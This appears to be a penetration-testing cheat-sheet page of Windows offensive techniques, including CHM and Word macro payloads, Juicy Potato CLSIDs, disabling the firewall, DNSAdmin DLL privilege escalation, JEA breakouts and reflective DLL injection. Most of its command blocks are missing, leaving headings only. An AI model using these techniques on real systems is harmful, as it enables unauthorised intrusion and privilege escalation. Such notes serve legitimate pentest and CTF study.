Windows
CHM
Use a Windows VM, install the required tools from here, then get the scricpt Out-CHM.ps1 and create your payload:
Juicy Potato
Metasploit (Details)
Common CLSIDs for the exploit are:
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
{3c6859ce-230b-48a4-be6c-932c0c202048}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
More can be found here
Word Macro
Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:
Alternativly we can use HTA:
Building and Signing MSIs
Use wix to generate msi files from xml or to manipulate existing msi files. A complete example can be seen in the Ethereal Writeup
Windows Firewall
List rules
Disable Firewall on Windows 7 via cmd
Disable Firewall on Windows 7 via Powershell
Disable Firewall on any windows via cmd
Load DLL from System32
Windows 10
RunAs
To run commands with runas, the user has to have logged in at least once.
Tools
Elevate Privileges by loading a custom DLL as DNSAdmin
Then restart the service:
DNS Enumeration/Exploitation Tools
Bypass JEA
When in constrained language mode (or more):
Read File:
Write File:
Break out by writing a powershell profile (executed whenever powershell is started by this user):
Via Script Blocks:
Custom function:
These vulnerabilities exist only in Constrained Language Mode, usually with JEA "NoLanguage" is to be used.
RCE via Cab Files
Reflectivly load DLL into explorer.exe
Via Invoke-ReflectivePEInjection.ps1 .
Dump Sticky Note Contents
Resources
Last updated